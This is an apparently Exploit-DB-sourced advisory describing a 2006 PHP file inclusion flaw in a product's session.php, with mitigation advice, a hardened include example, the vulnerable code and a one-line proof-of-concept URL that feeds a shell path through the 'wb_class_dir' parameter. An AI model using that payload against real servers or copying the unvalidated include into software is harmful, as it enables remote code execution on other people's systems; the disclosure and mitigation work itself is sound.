Vendor:
By: O.U.T.L.A.W
CVSS: 7.5 (HIGH)
Vulnerability type: Arbitrary File Inclusion
CWE: 98
Product Name:
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
Year: 2006

Arbitrary File Inclusion Vulnerability in session.php

session.php passes the 'wb_class_dir' variable, unvalidated, as the directory prefix of an include_once() call. An attacker who can set that variable through the request (the 'wb_class_dir' parameter) therefore chooses which file is included: a file containing PHP code, such as a shell script, is pulled in as if it were part of the application, and arbitrary commands then execute on the server with the web server's privileges.

Mitigation:

Update the code so that file inclusion never depends on unvalidated user input: validate and sanitize any value that reaches include_once(), and restrict inclusion to the directories the application actually needs.
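The hardened form of the include, written here as an added example rather than code from the advisory or from the affected product: the class directory comes from a fixed constant, the loadable class names are allowlisted, and the resolved path is checked to stay inside that directory. The constant name WB_CLASS_DIR, the directory layout, the class names in the allowlist and the open_basedir path are assumptions for illustration.

```php
<?php
// Added example: vulnerable pattern from the advisory beside a hardened include.

// --- Vulnerable pattern (as in session.php) ---
// $wb_class_dir is never initialised here; with register_globals enabled a
// request parameter of the same name decides which file gets included.
// include_once("$wb_class_dir/classDatabase.php");

// --- Hardened pattern ---
// 1. Derive the class directory from a fixed constant, never from request data.
//    (Directory layout is assumed.)
define('WB_CLASS_DIR', __DIR__ . '/../classes');

// 2. If a caller may choose *which* class to load, accept only names from a
//    fixed allowlist and resolve the final path against the base directory.
function include_class(string $name): void
{
    $allowed = ['classDatabase', 'classSession'];   // assumed class names
    if (!in_array($name, $allowed, true)) {
        throw new InvalidArgumentException("class not permitted: $name");
    }

    $base = realpath(WB_CLASS_DIR);
    $path = realpath(WB_CLASS_DIR . '/' . $name . '.php');

    // realpath() returns false for missing files and resolves "../" and
    // symlinks, so a prefix check on the resolved path also blocks traversal.
    if ($base === false || $path === false
        || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        throw new RuntimeException("refusing to include $name");
    }

    include_once $path;
}

include_class('classDatabase');

// 3. Configuration that removes the root cause regardless of application code
//    (php.ini, or .htaccess under mod_php); the open_basedir path is assumed:
//    register_globals = Off    (option removed entirely in PHP 5.4)
//    allow_url_include = Off
//    open_basedir = /var/www/app
```

The allowlist alone already closes the hole; the realpath() containment check is kept so that a later change which relaxes the allowlist (for example, accepting a module name from configuration) cannot quietly reintroduce traversal out of the class directory.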
Source (Exploit-DB raw data):

###########################################################################################
#                                   Aria-Security.net Advisory                            #
#                                 Discovered  by: O.U.T.L.A.W                             #
#                                < www.Aria-security.net >                                #
#                      Gr33t to: A.u.r.a  & l2odon & DrtRp & Sh3ll                        #              
###########################################################################################


<?php
// $wb_class_dir is never initialised in this file; with register_globals
// enabled it can be supplied by the request (see the proof of concept below).
include_once("$wb_class_dir/classDatabase.php");


function Start_Session()
{
    global $session_dir;

    if ( $session_dir != '' )
        session_save_path($session_dir);

    if ( ! isset($_SESSION) )
    {
        session_start();
        // Supposedly a fix for IE6
        header('Cache-control: private');
        My_Cache();

        if ( ! isset($_SESSION['db']) || gettype($_SESSION['db']->db) != 'resource')
            touchDatabaseSession();

    }
}


***********************************************************************

Proof of Concept:
server/includes/session.php?wb_class_dir=SHELL

Contact : Outlaw@aria-security.net

# milw0rm.com [2006-08-11]